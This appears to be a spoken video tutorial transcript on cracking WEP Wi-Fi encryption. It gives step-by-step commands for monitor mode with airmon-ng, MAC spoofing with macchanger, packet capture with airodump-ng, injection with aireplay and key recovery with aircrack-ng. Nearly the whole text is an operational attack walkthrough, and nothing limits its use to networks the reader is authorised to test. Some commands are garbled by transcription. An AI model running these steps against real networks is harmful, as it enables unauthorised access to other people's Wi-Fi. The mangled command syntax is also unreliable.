Hello, in this video I'll be teaching you how to crack a WEP wireless encryption. Alright, let's open up the terminal. Let's go to the root by typing in sudo space -i. Type in the password if you have one. And now you're at the root. First, we need to download some advanced packaging tools. So type in apt-get space install space airodump-ng and then press enter. If they need any confirmations, just press Y and enter. You also need to download macchanger. So do the same thing, apt-get space install space macchanger, macchanger, and then press enter. You will need an internet connection to download these tools. Okay, let's start our wireless device. So type in airmon-ng space start WLAN 0, which is my Wi-Fi device. Now type in airodump-ng WLAN 0 and find your wireless device. When you find your device, press Ctrl-C to stop the scanning. Here's my device. Look at the channel 6, and open a new terminal. Go to the root, and now we are going to change our access points channel to be on the same channel as the device that we want to crack. So for instance, my computer is listening on channel 1. I want to change it to listen on channel 6, which is the same as my network. So we're going to type ifconfig WLAN 0 down, enter, and then iwconfig space WLAN 0 space mode space managed, enter, and then ifconfig space WLAN 0 space up, and then iwconfig space WLAN 0 space channel, and then the channel you want to change it to. In this case, it would be 6 for me. And then type in ifconfig space WLAN 0 down, enter. And then you want to type in iwconfig space WLAN 0 space mode monitor, enter. And then we want to end with an ifconfig WLAN 0 up. And now you have configured your device to listen on the same channel. Now open a new terminal. Now we are going to change our MAC address. So type in airmon-ng airmon-ng space stop WLAN 0. We need to run it as root. Now that the Wi-Fi device has stopped, now we can change our MAC address by typing in macchanger space --mac and then whatever MAC address you want to choose. In my case, I will use 0011223344 4455, and then the device name, WLAN0. And now we have to start our device back up. So type in airmon-ng space start WLAN0. And now open a new terminal. Go to the root. And now type in airodump-ng space WLAN0. Now as soon as you see your Wi-Fi device, just press Ctrl-C and open a new terminal. Run it as root. And now you're going to need to type airodump-ng space -c and the channel of your device. So in this case it would be 6 space -w, and this is the name of the file that's going to capture the data. I will name it WEP space --BSSID, and now you'll type in the network's BSSID, and in this case it's this. Just copy and paste, and then end with the device name, WLAN0. And now it should collect data and open a new window. Run it as root. Now to collect the data even faster, we're going to run AirPlay. So type in AIREPLAY-3-B and the network's BSSID -H. And now this is going to be your fake MAC address. So I did 001122334455, and then end with the Wi-Fi device, WLAN0. And now it should capture packets. Now I will wait until the data has gotten 200,000 pieces of data, and then we'll crack it. Oh, okay, now we have 57,000 pieces of data. That should be quite enough. Some people might get data quicker, some people might get it slower. It all depends on the power and how fast the rate goes. It differs. Okay, let's stop both of them by clicking on the terminal and pressing Ctrl-C. And let's open up a new terminal and get to the root. Now type in aircrack-ng, AIRCRACK-ng space --BSSID, and then the network's BSSID. And then you need to type the name of the file where you saved the captured data. You can go to any other root terminal and just type ls, and this should give you a list of things. As you can see, I saved it in wep-01.cap. So copy that entire thing and just paste. And then press enter. As you can see, mine was captured very quickly and the key was found instantly because I had so many packets and I left it on for like 15 hours. But if you leave it on less, it'll go a little slower, and either way it'll work. Thank you for watching.